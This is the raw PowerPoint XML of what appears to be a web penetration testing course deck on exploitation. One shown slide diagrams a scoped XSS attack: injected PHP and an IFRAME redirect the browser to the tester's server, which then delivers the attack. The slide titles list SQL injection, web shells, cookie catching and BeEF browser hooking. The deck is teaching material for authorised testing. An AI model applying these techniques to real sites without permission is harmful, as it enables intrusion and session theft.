                  <a:gd name="T26" fmla="*/ 0 w 72"/>
                  <a:gd name="T27" fmla="*/ 0 h 70"/>
                  <a:gd name="T28" fmla="*/ 0 w 72"/>
                  <a:gd name="T29" fmla="*/ 0 h 70"/>
                  <a:gd name="T30" fmla="*/ 0 w 72"/>
                  <a:gd name="T31" fmla="*/ 0 h 70"/>
                  <a:gd name="T32" fmla="*/ 0 w 72"/>
                  <a:gd name="T33" fmla="*/ 0 h 70"/>
                  <a:gd name="T34" fmla="*/ 0 w 72"/>
                  <a:gd name="T35" fmla="*/ 0 h 70"/>
                  <a:gd name="T36" fmla="*/ 0 w 72"/>
                  <a:gd name="T37" fmla="*/ 0 h 70"/>
                  <a:gd name="T38" fmla="*/ 0 w 72"/>
                  <a:gd name="T39" fmla="*/ 0 h 70"/>
                  <a:gd name="T40" fmla="*/ 0 w 72"/>
                  <a:gd name="T41" fmla="*/ 0 h 70"/>
                  <a:gd name="T42" fmla="*/ 0 w 72"/>
                  <a:gd name="T43" fmla="*/ 0 h 70"/>
                  <a:gd name="T44" fmla="*/ 0 w 72"/>
                  <a:gd name="T45" fmla="*/ 0 h 70"/>
                  <a:gd name="T46" fmla="*/ 0 w 72"/>
                  <a:gd name="T47" fmla="*/ 0 h 70"/>
                  <a:gd name="T48" fmla="*/ 0 w 72"/>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0"/>
                  <a:gd name="T77" fmla="*/ 72 w 72"/>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0">
                    <a:moveTo>
                      <a:pt x="19" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="22" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="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88" name="Freeform 59"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="310" y="2485"/>
                <a:ext cx="5" cy="9"/>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w 16"/>
                  <a:gd name="T13" fmla="*/ 0 h 30"/>
                  <a:gd name="T14" fmla="*/ 0 w 16"/>
                  <a:gd name="T15" fmla="*/ 0 h 30"/>
                  <a:gd name="T16" fmla="*/ 0 w 16"/>
                  <a:gd name="T17" fmla="*/ 0 h 30"/>
                  <a:gd name="T18" fmla="*/ 0 w 16"/>
                  <a:gd name="T19" fmla="*/ 0 h 30"/>
                  <a:gd name="T20" fmla="*/ 0 w 16"/>
                  <a:gd name="T21" fmla="*/ 0 h 30"/>
                  <a:gd name="T22" fmla="*/ 0 w 16"/>
                  <a:gd name="T23" fmla="*/ 0 h 30"/>
                  <a:gd name="T24" fmla="*/ 0 w 16"/>
                  <a:gd name="T25" fmla="*/ 0 h 30"/>
                  <a:gd name="T26" fmla="*/ 0 w 16"/>
                  <a:gd name="T27" fmla="*/ 0 h 30"/>
                  <a:gd name="T28" fmla="*/ 0 w 16"/>
                  <a:gd name="T29" fmla="*/ 0 h 30"/>
                  <a:gd name="T30" fmla="*/ 0 w 16"/>
                  <a:gd name="T31" fmla="*/ 0 h 30"/>
                  <a:gd name="T32" fmla="*/ 0 w 16"/>
                  <a:gd name="T33" fmla="*/ 0 h 30"/>
                  <a:gd name="T34" fmla="*/ 0 w 16"/>
                  <a:gd name="T35" fmla="*/ 0 h 30"/>
                  <a:gd name="T36" fmla="*/ 0 w 16"/>
                  <a:gd name="T37" fmla="*/ 0 h 30"/>
                  <a:gd name="T38" fmla="*/ 0 w 16"/>
                  <a:gd name="T39" fmla="*/ 0 h 30"/>
                  <a:gd name="T40" fmla="*/ 0 w 16"/>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0"/>
                  <a:gd name="T65" fmla="*/ 16 w 1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0">
                    <a:moveTo>
                      <a:pt x="7" y="30"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="5" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="30"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="33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sp>
        <p:nvSpPr>
          <p:cNvPr id="6154" name="Text Box 60"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5715000" y="5029200"/>
            <a:ext cx="8001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br>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Browser</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6155" name="Text Box 61"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="152400" y="5210175"/>
            <a:ext cx="6350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a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Tester</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6156" name="Text Box 62"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4876800" y="3429000"/>
            <a:ext cx="1041400"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Target</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Web Server</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6157" name="Text Box 63"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1273175" y="3802063"/>
            <a:ext cx="1089025"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lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Pen Tester</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1200" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>'s</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Web Server</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6158" name="Freeform 64"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="965200" y="4143375"/>
            <a:ext cx="4978400" cy="1435100"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483647 w 3136"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 904"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 3136"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 904"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 3136"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 904"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 3136"/>
              <a:gd name="T7" fmla="*/ 0 h 904"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 60000 65536"/>
              <a:gd name="T10" fmla="*/ 0 60000 65536"/>
              <a:gd name="T11" fmla="*/ 0 60000 65536"/>
              <a:gd name="T12" fmla="*/ 0 w 3136"/>
              <a:gd name="T13" fmla="*/ 0 h 904"/>
              <a:gd name="T14" fmla="*/ 3136 w 3136"/>
              <a:gd name="T15" fmla="*/ 904 h 904"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T8">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T9">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T10">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
              <a:cxn ang="T11">
                <a:pos x="T6" y="T7"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T12" t="T13" r="T14" b="T15"/>
            <a:pathLst>
              <a:path w="3136" h="904">
                <a:moveTo>
                  <a:pt x="208" y="816"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="104" y="860"/>
                  <a:pt x="0" y="904"/>
                  <a:pt x="256" y="816"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="512" y="728"/>
                  <a:pt x="1264" y="424"/>
                  <a:pt x="1744" y="288"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2224" y="152"/>
                  <a:pt x="2680" y="76"/>
                  <a:pt x="3136" y="0"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="76200">
            <a:solidFill>
              <a:schemeClr val="accent2"/>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6159" name="Text Box 65"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="ltGray">
          <a:xfrm>
            <a:off x="2057400" y="5121275"/>
            <a:ext cx="1676400" cy="1381125"/>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1. Inject PHP code … also inject web content to call PHP page via IFRAME</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6160" name="Freeform 66"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6438900" y="4283075"/>
            <a:ext cx="571500" cy="1003300"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483647 w 360"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 632"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 360"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 632"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 360"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 632"/>
              <a:gd name="T6" fmla="*/ 0 60000 65536"/>
              <a:gd name="T7" fmla="*/ 0 60000 65536"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 w 360"/>
              <a:gd name="T10" fmla="*/ 0 h 632"/>
              <a:gd name="T11" fmla="*/ 360 w 360"/>
              <a:gd name="T12" fmla="*/ 632 h 632"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T6">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T7">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T8">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T9" t="T10" r="T11" b="T12"/>
            <a:pathLst>
              <a:path w="360" h="632">
                <a:moveTo>
                  <a:pt x="360" y="584"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="204" y="292"/>
                  <a:pt x="48" y="0"/>
                  <a:pt x="24" y="8"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="16"/>
                  <a:pt x="108" y="324"/>
                  <a:pt x="216" y="632"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="76200">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>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6161" name="Text Box 68"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="ltGray">
          <a:xfrm>
            <a:off x="7391400" y="5638800"/>
            <a:ext cx="1676400" cy="742950"/>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4. Run XSS … if target server delivered it</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6162" name="Text Box 70"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="ltGray">
          <a:xfrm>
            <a:off x="6553200" y="3200400"/>
            <a:ext cx="2438400" cy="9540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3. PHP determines if browser IP address is in scope and, if so, delivers XSS attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6163" name="Text Box 71"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="ltGray">
          <a:xfrm>
            <a:off x="7100888" y="4454525"/>
            <a:ext cx="2043112" cy="954088"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFCC66"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>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r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>2. Access injected content … getting redirected to PHP page</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition/>
</p:sld>
</file>

<file path=ppt/theme/theme1.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="1_HE_template">
  <a:themeElements>
    <a:clrScheme name="SANS - Template 2012">
      <a:dk1>
        <a:srgbClr val="000000"/>
      </a:dk1>
      <a:lt1>
        <a:srgbClr val="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="002060"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="FFFFFF"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="002060"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="0070C0"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="00B050"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="993300"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="FF3300"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="FFC000"/>
      </a:accent6>
      <a:hlink>
        <a:srgbClr val="000000"/>
      </a:hlink>
      <a:folHlink>
        <a:srgbClr val="000000"/>
      </a:folHlink>
    </a:clrScheme>
    <a:fontScheme name="HE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32969</TotalTime>
  <Words>16868</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>2407</Paragraphs>
  <Slides>133</Slides>
  <Notes>133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133</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="144" baseType="lpstr">
      <vt:lpstr>Tahoma</vt:lpstr>
      <vt:lpstr>MS PGothic</vt:lpstr>
      <vt:lpstr>MS PGothic</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Lucida Grande</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>1_HE_template</vt:lpstr>
      <vt:lpstr>Clip</vt:lpstr>
      <vt:lpstr>Web Penetration Testing and Ethical Hacking Exploitation</vt:lpstr>
      <vt:lpstr>Course Outline</vt:lpstr>
      <vt:lpstr>Course Roadmap</vt:lpstr>
      <vt:lpstr>Exploitation</vt:lpstr>
      <vt:lpstr>Previous Steps</vt:lpstr>
      <vt:lpstr>Expand the Foothold</vt:lpstr>
      <vt:lpstr>Exploits</vt:lpstr>
      <vt:lpstr>Course Roadmap</vt:lpstr>
      <vt:lpstr>Authentication Bypass</vt:lpstr>
      <vt:lpstr>Bypass Methods</vt:lpstr>
      <vt:lpstr>Course Roadmap</vt:lpstr>
      <vt:lpstr>Course Roadmap</vt:lpstr>
      <vt:lpstr>Injection Flaws</vt:lpstr>
      <vt:lpstr>Course Roadmap</vt:lpstr>
      <vt:lpstr>SQL Injection Example</vt:lpstr>
      <vt:lpstr>Always True</vt:lpstr>
      <vt:lpstr>SQL Review</vt:lpstr>
      <vt:lpstr>Insert/Union Notes</vt:lpstr>
      <vt:lpstr>Fingerprinting the Database (1)</vt:lpstr>
      <vt:lpstr>Fingerprinting the Database (2)</vt:lpstr>
      <vt:lpstr>Attack Ideas</vt:lpstr>
      <vt:lpstr>Extend our Attack</vt:lpstr>
      <vt:lpstr>Course Roadmap</vt:lpstr>
      <vt:lpstr>File Handling</vt:lpstr>
      <vt:lpstr>Read File (MySQL)</vt:lpstr>
      <vt:lpstr>Write File (MySQL)</vt:lpstr>
      <vt:lpstr>Read/Write File (Oracle)</vt:lpstr>
      <vt:lpstr>Read File (MS SQL)</vt:lpstr>
      <vt:lpstr>Write File (MS SQL)</vt:lpstr>
      <vt:lpstr>Read/Write to a File (PostGRES)</vt:lpstr>
      <vt:lpstr>Course Roadmap</vt:lpstr>
      <vt:lpstr>OS Interaction (MSSQL)</vt:lpstr>
      <vt:lpstr>OS Interaction Example</vt:lpstr>
      <vt:lpstr>Re-enabling xp_cmdshell</vt:lpstr>
      <vt:lpstr>OS Interaction (PostGRES)</vt:lpstr>
      <vt:lpstr>Course Roadmap</vt:lpstr>
      <vt:lpstr>Port Scanning</vt:lpstr>
      <vt:lpstr>Port Scanning Example</vt:lpstr>
      <vt:lpstr>Course Roadmap</vt:lpstr>
      <vt:lpstr>File Injection</vt:lpstr>
      <vt:lpstr>File Injection Examples</vt:lpstr>
      <vt:lpstr>Course Roadmap</vt:lpstr>
      <vt:lpstr>Prepared Injection Files</vt:lpstr>
      <vt:lpstr>PHPShell</vt:lpstr>
      <vt:lpstr>AJAXShell</vt:lpstr>
      <vt:lpstr>Laudanum</vt:lpstr>
      <vt:lpstr>Course Roadmap</vt:lpstr>
      <vt:lpstr>Course Roadmap</vt:lpstr>
      <vt:lpstr>Blind SQL Injection</vt:lpstr>
      <vt:lpstr>Course Roadmap</vt:lpstr>
      <vt:lpstr>Course Roadmap</vt:lpstr>
      <vt:lpstr>Cross Site Scripting</vt:lpstr>
      <vt:lpstr>POST XSS Flaws</vt:lpstr>
      <vt:lpstr>Typical Exploits with XSS</vt:lpstr>
      <vt:lpstr>Reading Cookies</vt:lpstr>
      <vt:lpstr>Cookie Catcher</vt:lpstr>
      <vt:lpstr>Redirecting a User</vt:lpstr>
      <vt:lpstr>External Scripts</vt:lpstr>
      <vt:lpstr>Evasion</vt:lpstr>
      <vt:lpstr>Evasion Example (1)</vt:lpstr>
      <vt:lpstr>Evasion Example (2)</vt:lpstr>
      <vt:lpstr>Course Roadmap</vt:lpstr>
      <vt:lpstr>Course Roadmap</vt:lpstr>
      <vt:lpstr>Advanced Script Injection</vt:lpstr>
      <vt:lpstr>Port Scanner</vt:lpstr>
      <vt:lpstr>Internal Addresses</vt:lpstr>
      <vt:lpstr>Using MyAddress.class</vt:lpstr>
      <vt:lpstr>Fingerprinting Servers</vt:lpstr>
      <vt:lpstr>Fingerprinting Code</vt:lpstr>
      <vt:lpstr>Sources of Defaults</vt:lpstr>
      <vt:lpstr>Browse History</vt:lpstr>
      <vt:lpstr>Uses for History Scanning</vt:lpstr>
      <vt:lpstr>Durzosploit</vt:lpstr>
      <vt:lpstr>Course Roadmap</vt:lpstr>
      <vt:lpstr>Course Roadmap</vt:lpstr>
      <vt:lpstr>Exploit Frameworks</vt:lpstr>
      <vt:lpstr>Frameworks Covered</vt:lpstr>
      <vt:lpstr>Zombies</vt:lpstr>
      <vt:lpstr>Course Roadmap</vt:lpstr>
      <vt:lpstr>BeEF</vt:lpstr>
      <vt:lpstr>BeEF Interface</vt:lpstr>
      <vt:lpstr>Zombie Control</vt:lpstr>
      <vt:lpstr>BeEF Functionality</vt:lpstr>
      <vt:lpstr>Clipboard Theft</vt:lpstr>
      <vt:lpstr> History Browsing</vt:lpstr>
      <vt:lpstr>Request Initiation</vt:lpstr>
      <vt:lpstr>Port Scanning</vt:lpstr>
      <vt:lpstr>Browser Exploitation</vt:lpstr>
      <vt:lpstr>Inter-protocol Exploitation</vt:lpstr>
      <vt:lpstr>BeEF Protocol Exploitation (1)</vt:lpstr>
      <vt:lpstr>BeEF Exploit Module Interface</vt:lpstr>
      <vt:lpstr>BeEF Inter-Protocol  Exploitation (2)</vt:lpstr>
      <vt:lpstr>BeEF Interface</vt:lpstr>
      <vt:lpstr>Course Roadmap</vt:lpstr>
      <vt:lpstr>Course Roadmap</vt:lpstr>
      <vt:lpstr>Limiting Targets of XSS Attacks</vt:lpstr>
      <vt:lpstr>1) Client-Side Code with Java Applet</vt:lpstr>
      <vt:lpstr>2) Client-side Code with Pen Tester's Server Identifying IP Address</vt:lpstr>
      <vt:lpstr>3) Server-Side Code on Target Server</vt:lpstr>
      <vt:lpstr>4) Server-Side Code on Pen Tester's Server</vt:lpstr>
      <vt:lpstr>5) Pen Tester Infrastructure Configuration</vt:lpstr>
      <vt:lpstr>Course Roadmap</vt:lpstr>
      <vt:lpstr>Session Flaws</vt:lpstr>
      <vt:lpstr>Course Roadmap</vt:lpstr>
      <vt:lpstr>Session Fixation</vt:lpstr>
      <vt:lpstr>Course Roadmap</vt:lpstr>
      <vt:lpstr>Attacking XSRF</vt:lpstr>
      <vt:lpstr>Course Roadmap</vt:lpstr>
      <vt:lpstr>Course Roadmap</vt:lpstr>
      <vt:lpstr>Putting it Together</vt:lpstr>
      <vt:lpstr>A Process</vt:lpstr>
      <vt:lpstr>Pivot Points</vt:lpstr>
      <vt:lpstr>Course Roadmap</vt:lpstr>
      <vt:lpstr>Attack Scenario</vt:lpstr>
      <vt:lpstr>Scenario Setup</vt:lpstr>
      <vt:lpstr>Application Setup</vt:lpstr>
      <vt:lpstr>Recon</vt:lpstr>
      <vt:lpstr>Mapping</vt:lpstr>
      <vt:lpstr>Discovery</vt:lpstr>
      <vt:lpstr>Exploitation</vt:lpstr>
      <vt:lpstr>Recon</vt:lpstr>
      <vt:lpstr>Mapping</vt:lpstr>
      <vt:lpstr>Discovery</vt:lpstr>
      <vt:lpstr>Exploitation</vt:lpstr>
      <vt:lpstr>Course Roadmap</vt:lpstr>
      <vt:lpstr>Next Steps</vt:lpstr>
      <vt:lpstr>Practice</vt:lpstr>
      <vt:lpstr>Pre-built Applications</vt:lpstr>
      <vt:lpstr>Web Application Lab</vt:lpstr>
      <vt:lpstr>Explore</vt:lpstr>
      <vt:lpstr>Explain</vt:lpstr>
      <vt:lpstr>Course Roadmap</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Penetration Testing and Ethical Hacking</dc:title>
  <dc:subject>Exploitation</dc:subject>
  <dc:creator>Kevin Johnson</dc:creator>
  <dc:description>processed_12.12.13.rlr
processed_12.22.12.rlr
processed_04.02.12.rlr
processed 061611 rmw
processed 020811 rmw
processed_09.08.10.rlr
processed 05/28/10 rmw
processed 03/10/10 rmw
cooked 070809 rmw - cooked 103009 rmw - 
11/19/09: rev1 is generated by: spacing adjustment to notes on slide 88; grayscale adjustments to slides 16, 17, 18, 19, 20, 22</dc:description>
  <cp:lastModifiedBy>Kevin Johnson</cp:lastModifiedBy>
  <cp:revision>2699</cp:revision>
  <cp:lastPrinted>2013-12-12T20:24:13Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2012-07-22T19:59:07Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-01-30T13:20:52Z</dcterms:modified>
  <cp:category>Security</cp:category>
</cp:coreProperties>
</file>